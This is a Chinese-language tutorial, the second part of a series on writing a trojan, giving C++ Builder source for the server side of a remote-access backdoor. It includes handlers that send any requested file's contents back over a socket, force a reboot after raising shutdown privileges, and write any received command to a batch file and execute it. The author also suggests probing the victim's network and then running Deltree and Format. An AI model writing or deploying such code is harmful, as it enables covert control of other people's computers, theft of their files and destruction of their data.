木马是如何编写的(二)

够长吧？！察看目录树这么费劲啊？！你后面可以用BCB中的各种列表框对Client.exe好好美化美化。接下来就是查看指定文件的内容了，Client将使用“type”命令，（手指累不累啊？）：

{

else if（temp.SubString（0，4）=="type"）

{

//如果前4个字符是“type”

int Read_Num;

int number=temp.Length（）;

AnsiString File_Name=temp.SubString（6，number-4）;

//将目标文件流存入File_Name变量中

times_of_try=0;

while（fp==NULL）

{

fp=fopen（File_Name.c_str（），"r"）;

//打开目标文件准备读

times_of_try=times_of_try+1;

//计数器加1

if（times_of_try>100）

{

//如果已试了100次了

Socket->SendText（"Fail By Open File"）;

//返回“Fail By Open File”的错误信息

goto END;

//跳到END

}

}

AnsiString Return_Text="";

char temp_content[300];

for（int i=0;i<300;i++） temp_content='';

//定义一个空数组

Read_Num=fread（temp_content，1，300，fp）;

//从目标文件中读入前300个字符

while（Read_Num==300）

{

Return_Text=Return_Text+temp_content;

//Return_Text的内容加上刚才的字符

for（int i=0;i<300;i++） temp_content='';

Read_Num=fread（temp_content，1，300，fp）;

//重复

};

Return_Text=Return_Text+temp_content;

//Return_Text的内容加上刚才的字符

fclose（fp）;

//关闭目标文件

Socket->SendText（Return_Text）;

//返回Return_Text的内容，即你查看文件的内容

}

}

咳咳！累死了！还是来点轻松的吧——操纵目标机的光驱（注意：mciSendString（）函数的声明在mmsystem.h头文件中）：

{

else if（temp=="open"）

{

//如果收到的temp的内容是“open”

mciSendString（"set cdaudio door open"， NULL， 0， NULL）;

//就弹出光驱的托盘

}

else if（temp=="close"）

{

//如果收到的temp的内容是“close”

mciSendString（"Set cdaudio door closed wait"， NULL， 0， NULL）;

//就收入光驱的托盘。当然你也可以搞个死循环，让他的光驱好好活动活动！^_^

}

}

接着就是交换目标机的鼠标左右键，代码如下：

{

else if（temp=="swap"）

{

SwapMouseButton（1）;

//交换鼠标左右键，简单吧？

}

}

然后就是使目标机重新启动。但这里要区分WinNt和Win9x——NT非常注重系统每个进程的权利，一个普通的进程是不应具备有调用系统的权利的，因此我们要赋予本程序足够的权限：

{

else if（temp=="reboot"）

{

//如果收到的temp的内容是“temp”

DWORD dwVersion = GetVersion（）;

//得到操作系统的版本号

if （dwVersion < 0x80000000）

{

//操作系统是WinNt，不是Win9x

HANDLE hToken;

TOKEN_PRIVILEGES tkp;

//定义变量

OpenProcessToken（GetCurrentProcess（），TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY， &hToken）;

//OpenProcessToken（）这个函数的作用是打开一个进程的访问令牌

//GetCurrentProcess（）函数的作用是得到本进程的句柄

LookupPrivilegeValue（NULL， SE_SHUTDOWN_NAME，&tkp.Privileges[0].Luid）;

//LookupPrivilegeValue（）的作用是修改进程的权限

tkp.PrivilegeCount = 1;

//赋给本进程特权

tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

AdjustTokenPrivileges（hToken， FALSE， &tkp， 0，（PTOKEN_PRIVILEGES）NULL， 0）;

//AdjustTokenPrivileges（）的作用是通知Windows NT修改本进程的权利

ExitWindowsEx（EWX_REBOOT | EWX_FORCE， 0）;

//强行退出WinNt并重启

}

else ExitWindowsEx（EWX_FORCE+EWX_REBOOT，0）;

//强行退出Win9x并重启

}

}

如果以上都不是，就让它在Dos窗口中执行传来的命令：

{

else

{

//如果都不是

char * CR_TF="n";

times_of_try=0;

while（fp==NULL）

{

fp=fopen（TempFile，"w+"）;

//创建Win369.bat，如果已存在就覆盖

times_of_try=times_of_try+1;

//计数器加1

if（times_of_try>100）

{

Socket->SendText（"Fail By Open File"）;

//返回“Fail By Open File”的信息

goto END;

//跳到END

}

}

fwrite（temp.c_str（），sizeof（char），strlen（temp.c_str（）），fp）;

//写入欲执行的命令

fwrite（CR_TF，sizeof（char），strlen（CR_TF），fp）;

//写入换行符

fclose（fp）;

//关闭Win369.bat

system（TempFile）;

//执行Win369.bat

Socket->SendText（"Success"）;

//返回“Success”信息

}

}

你可以直接执行什么Ping和Tracert之类的命令来进一步刺探目标机的网络状况（判断是否是一个企业的局域网），然后可以进一步攻击，比如Deltree和Format命令。

到此，服务器程序的功能已全部完成，但还差容错部分未完成，这样才能避免程序因意外而崩溃。朋友，别走开！（未完待续）